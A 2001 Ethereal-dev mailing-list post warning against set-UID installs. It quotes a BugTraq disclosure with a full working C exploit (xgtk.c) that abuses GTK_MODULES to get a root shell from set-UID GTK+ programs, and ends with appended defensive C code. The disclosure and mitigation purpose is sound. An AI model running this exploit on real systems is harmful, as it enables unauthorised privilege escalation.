Ethereal-dev: Re: [Ethereal-dev] Set-UID (and set-GID) GTK+ programs are insecure

Note: This archive is from the project's previous web site, ethereal.com. This list is no longer active.

From: Nathan Neulinger <nneul@xxxxxxx>
Date: Tue, 02 Jan 2001 21:06:40 -0600
Just to make it abundantly clear, while the below is an issue, it's the
LEAST of your worries making something like ethereal setuid.

Making ethereal setuid is functionally equivalent to making 'cat' setuid.
It's not designed for it, and likely never will be.

For the simplest example: create a capture, save as "/etc/passwd". If
it's setuid, you just replaced the passwd file. And, depending on how
ethereal handles umasks and file creation, you may just have created
/etc/passwd world writable. 

Now, once the 'capture' portion is made to be an external miniature
setuid app, then the story will be different.

The only time when ethereal should be setuid is when you would be happy
to give root to any person you allow to run ethereal, and even then it's
just a bad idea. (i.e. you are doing it because you are too lazy to su
before running it.)

Now, it might be reasonably safe to allow tethereal to be setuid - *IF*
it disables all -r/-w file I/O functions when running with uid != euid
*or* makes extensive use of access(), but even then, I'd say it's a bad
idea without a significant security audit.

I personally think that the setuid install option should never have been
added. The very idea of doing that type of install is ludicrous to me in
Ethereal's current design.

-- Nathan

Guy Harris wrote:
> 
> Why you might not want to make Ethereal set-UID:
> 
> From: Erik Mouw <J.A.K.Mouw@xxxxxxxxxxxxxx>
> To: gtk-devel-list@xxxxxxxxx
> Subject: Fwd: gtk+ security hole.
> Organization: Eric Conspiracy Secret Labs
> 
> Hi all,
> 
> This came by on the BugTraq mailing list. Pity that the original poster
> didn't take this to the gtk-devel list.
> 
> I replied to the original message stating that suid GTK+ programs are
> discouraged. Don't know if the moderator will let my reply through,
> though.
> 
> Erik
> 
> ----- Forwarded message from Chris Sharp <v9@xxxxxxxxxxxx> -----
> 
> From: Chris Sharp <v9@xxxxxxxxxxxx>
> To: BUGTRAQ@xxxxxxxxxxxxxxxxx
> Date:         Tue, 2 Jan 2001 00:15:35 -0000
> Subject:      gtk+ security hole.
> 
> while going through a quick audit of gtk i found:
> 
> gtk+ can be tricked into running arbitrary code
> via a bogus module.  this means any program using
> gtk that is set*id can be exploited via this
> method.  here is an exploit i wrote for this
> security hole:
> 
> original xgtk.c(working/un-wrapped):
> http://realhalo.org/xgtk.c
> 
> xgtk.c:
> /* (*)gtk+[v*] local module exploit, by v9[v9@xxxxxxxxxxxx].  this will give
>    you the euid/egid of a set*id program using gtk+.  this exploit works via
>    the GTK_MODULES environmental variable, by tricking gtk to execute arbitrary
>    functions/commands with a bogus module. (using gtk_module_init())
> 
>    example(./xgtk):
> -------------------------------------------------------------------------------
> # ls -l /usr/bin/X11/gtk_program
> -rwxr-sr-x   1 root     tty        437625 Oct 23  1999 /usr/bin/X11/gtk_program
> # cc xgtk.c -o xgtk
> # ./xgtk /usr/bin/X11/gtk_program :0.0
> [ (*)gtk+[v*] local module exploit, by v9[v9@xxxxxxxxxxxx]. ]
> [ program: /usr/bin/X11/gtk_program(->/bin/sh), display: :0.0. ]
> 
> [*] making module for gtk+ to execute. (/tmp/gtkm.c)
> [*] done, compiling module source file. (/tmp/gtkm.c->/tmp/gtkm.so)
> [*] done, checking to see if the module compiled. (/tmp/gtkm.so)
> [*] done, setting up the environment. (module&display)
> [*] done, executing /usr/bin/X11/gtk_program, the module should load now.
> [*] success, module loaded successfully.
> [*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
> [*] now executing: /bin/sh.
> #
> -------------------------------------------------------------------------------
> 
>    note: this will require a valid display to exploit successfully.  also, i'm
>          unsure of this for other gtk versions, i would just assume as much
>          that this applies to it.
> */
> #define GCCPATH "/usr/bin/gcc"  // path to gcc.
> #define SRCFILE "/tmp/gtkm.c"   // source to the fake module to load.
> #define MODEXEC "/tmp/gtkm.so"  // fake module to load.
> #define DISPLAY ":0.0"          // default display. (also argv option)
> #define EXECUTE "/bin/sh"       // execute this program.
> #include <stdio.h>
> #include <stdlib.h>             // exit(), system(), setenv()
> #include <string.h>             // strncpy()
> #include <unistd.h>             // unlink(), execl()
> #include <sys/stat.h>
> int main(int argc,char **argv){
>  char cmd[256],syscmd[256],display[256];
>  struct stat mod1,mod2,mod3;
>  FILE *source;
>  fprintf(stderr,"[ (*)gtk+[v*] local module exploit, by v9[v9@xxxxxxxxxxxx]. ]"
>  "\n");
>  if(argc>1){strncpy(cmd,argv[1],sizeof(cmd)-1);cmd[sizeof(cmd)-1]='\0';}
>  else{
>   fprintf(stderr,"[!] syntax: %s </path/to/program> [display]\n",argv[0]);
>   exit(-1);
>  }
>  if(argc>2){strncpy(display,argv[2],sizeof(display)-1);}
>  else{strncpy(display,DISPLAY,sizeof(display)-1);}
>  display[sizeof(display)-1]='\0';
>  if(stat(cmd,&mod1)){
>   fprintf(stderr,"[!] failed, %s doesn't seem to exist. (path needed)\n",cmd);
>   exit(-1);
>  }
>  if(stat(GCCPATH,&mod2)){
>   fprintf(stderr,"[!] failed, %s compiler doesn't seem to exist.\n",GCCPATH);
>   exit(-1);
>  }
>  fprintf(stderr,"[ program: %s(->%s), display: %s. ]\n\n",cmd,EXECUTE,display);
>  fprintf(stderr,"[*] making module for gtk+ to execute. (%s)\n",SRCFILE);
>  unlink(SRCFILE);
>  unlink(MODEXEC);
>  /* the bogus module: gtk+ dlopen()s it and calls gtk_module_init(), which
>     then runs with the set*id program's effective ids. */
>  source=fopen(SRCFILE,"w");
>  if(source==NULL){
>   fprintf(stderr,"[!] failed, cannot create %s.\n",SRCFILE);
>   exit(-1);
>  }
>  fprintf(source,"#include <stdio.h>\n");
>  fprintf(source,"#include <unistd.h>\n");
>  fprintf(source,"void gtk_module_init(){\n");
>  fprintf(source," unlink(\"%s\");\n",SRCFILE);
>  fprintf(source," unlink(\"%s\");\n",MODEXEC);
>  fprintf(source," fprintf(stderr,\"[*] success, module loaded successfully.\\n\");\n");
>  fprintf(source," fprintf(stderr,\"[*] id stats: uid: %%d, euid: %%d, gid: %%d"
>  ", egid: %%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
>  fprintf(source," fprintf(stderr,\"[*] now executing: %s.\\n\");\n",EXECUTE);
>  fprintf(source," execl(\"%s\",\"%s\",(char *)0);\n",EXECUTE,EXECUTE);
>  fprintf(source,"}\n");
>  fclose(source);
>  fprintf(stderr,"[*] done, compiling module source file. (%s->%s)\n",SRCFILE,
>  MODEXEC);
>  snprintf(syscmd,sizeof(syscmd),"%s -shared -fPIC -o %s %s 1>/dev/null 2>&1",
>  GCCPATH,MODEXEC,SRCFILE);
>  system(syscmd);
>  fprintf(stderr,"[*] done, checking to see if the module compiled. (%s)\n",
>  MODEXEC);
>  if(stat(MODEXEC,&mod3)){
>   fprintf(stderr,"[!] failed, %s was not compiled properly. (gcc failed)\n",
>   MODEXEC);
>   exit(-1);
>  }
>  fprintf(stderr,"[*] done, setting up the environment. (module&display)\n");
>  setenv("GTK_MODULES",MODEXEC,1);
>  setenv("DISPLAY",display,1);
>  fprintf(stderr,"[*] done, executing %s, the module should load now.\n",cmd);
>  if(execl(cmd,cmd,(char *)0)){
>   fprintf(stderr,"[!] failed, %s did not execute properly.\n",cmd);
>   unlink(SRCFILE);
>   unlink(MODEXEC);
>   exit(-1);
>  }
>  return 0;
> }
> 
> Vade79 -> v9@xxxxxxxxxxxx -> www.fakehalo.org.
> 
> ----- End forwarded message -----
> 
> --
> J.A.K. (Erik) Mouw, Information and Communication Theory Group, Department
> of Electrical Engineering, Faculty of Information Technology and Systems,
> Delft University of Technology, PO BOX 5031,  2600 GA Delft, The Netherlands
> Phone: +31-15-2783635  Fax: +31-15-2781843  Email: J.A.K.Mouw@xxxxxxxxxxxxxx
> WWW: http://www-ict.its.tudelft.nl/~erik/
> 
> _______________________________________________
> gtk-devel-list mailing list
> gtk-devel-list@xxxxxxxxx
> http://mail.gnome.org/mailman/listinfo/gtk-devel-list
> 
> _______________________________________________
> Ethereal-dev mailing list
> Ethereal-dev@xxxxxxxxxxxx
> http://www.ethereal.com/mailman/listinfo/ethereal-dev

-- 


------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul@xxxxxxx
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216
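Nathan's two points (a set-UID capture tool that can "save as /etc/passwd", and file I/O that is only defensible when gated on uid != euid or access()) and the GTK_MODULES loader abused by the forwarded exploit both come down to the same missing guards. The following is an added example of those guards; it is not Ethereal, GTK+ or either poster's code. The function names, the /tmp path used in the demo, and GTK_PATH (assumed here to be a second GTK+ module search-path variable) are my assumptions.

```c
/* Added example, not from Ethereal, GTK+ or the original posters.  Shows the
 * guards a set-UID program needs before untrusted users could run it:
 *  1. scrub environment variables that make the toolkit dlopen() user-supplied
 *     code (GTK_MODULES, as in the BugTraq post) before the toolkit is
 *     initialised;
 *  2. create files with the *real* user's credentials and an exclusive open,
 *     so saving a capture as /etc/passwd fails instead of replacing the file.
 * Function names and GTK_PATH are assumptions made for this example. */
#define _XOPEN_SOURCE 700       /* seteuid/setegid/unsetenv prototypes */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* True when the process holds more privilege than the user who ran it. */
int privilege_elevated(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Variables that tell GTK+ where to find and which modules to dlopen().
 * The dynamic loader ignores LD_PRELOAD/LD_LIBRARY_PATH for set-UID binaries,
 * but nothing does the same for toolkit-specific variables. */
static const char *const unsafe_env[] = { "GTK_MODULES", "GTK_PATH", NULL };

/* Remove them when running elevated.  Must be called before gtk_init().
 * Returns the number of variables removed. */
int scrub_unsafe_env(int elevated)
{
    int removed = 0;
    if (!elevated)
        return 0;
    for (const char *const *p = unsafe_env; *p != NULL; p++) {
        if (getenv(*p) != NULL) {
            unsetenv(*p);
            removed++;
        }
    }
    return removed;
}

/* Create 'path' for writing as the invoking user: effective ids are dropped
 * for the open() and restored afterwards.  O_EXCL refuses an existing file
 * (an existing /etc/passwd is never truncated) and the explicit 0600 mode
 * does not depend on the caller's umask.  access(2) is deliberately not used:
 * it checks with the real uid but leaves a time-of-check/time-of-use race
 * before the open.  Returns the fd, or -1 with errno set. */
int open_new_file_as_real_user(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: once the uid is unprivileged, setegid() may fail. */
    if (setegid(getgid()) == -1 || seteuid(getuid()) == -1)
        return -1;

    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    saved_errno = errno;

    /* Regain privilege for the rest of the program (e.g. the capture itself). */
    if (seteuid(saved_euid) == -1 || setegid(saved_egid) == -1) {
        if (fd != -1)
            close(fd);
        abort();                /* credentials in an unknown state */
    }
    errno = saved_errno;
    return fd;
}

/* Demonstrates the O_EXCL guard: the first create succeeds, a second attempt
 * on the same path fails with EEXIST.  Returns 1 if both behave as expected. */
int exclusive_create_demo(const char *path)
{
    int first, second, ok;
    unlink(path);
    first = open_new_file_as_real_user(path);
    if (first == -1)
        return 0;
    close(first);
    second = open_new_file_as_real_user(path);
    ok = (second == -1 && errno == EEXIST);
    if (second != -1)
        close(second);
    unlink(path);
    return ok;
}

int main(void)
{
    int elevated = privilege_elevated(getuid(), geteuid(), getgid(), getegid());
    printf("elevated: %d, scrubbed %d variable(s)\n",
           elevated, scrub_unsafe_env(elevated));
    int fd = open_new_file_as_real_user("/etc/passwd");
    printf("open /etc/passwd: %s\n", fd == -1 ? strerror(errno) : "succeeded (!)");
    if (fd != -1)
        close(fd);
    printf("exclusive create demo: %d\n", exclusive_create_demo("/tmp/setuid_demo.txt"));
    return 0;
}
```

Two caveats. The scrub must run before gtk_init(); once the toolkit has dlopen()ed a module from GTK_MODULES it is too late. And seteuid() only drops the effective id: the saved set-user-ID stays root, so any code the program later loads can call seteuid(0) and get it back. That is why the privilege drop above only makes the file write safer, and why Nathan's suggestion of a separate minimal set-UID capture helper, with the GUI running unprivileged, is the actual fix.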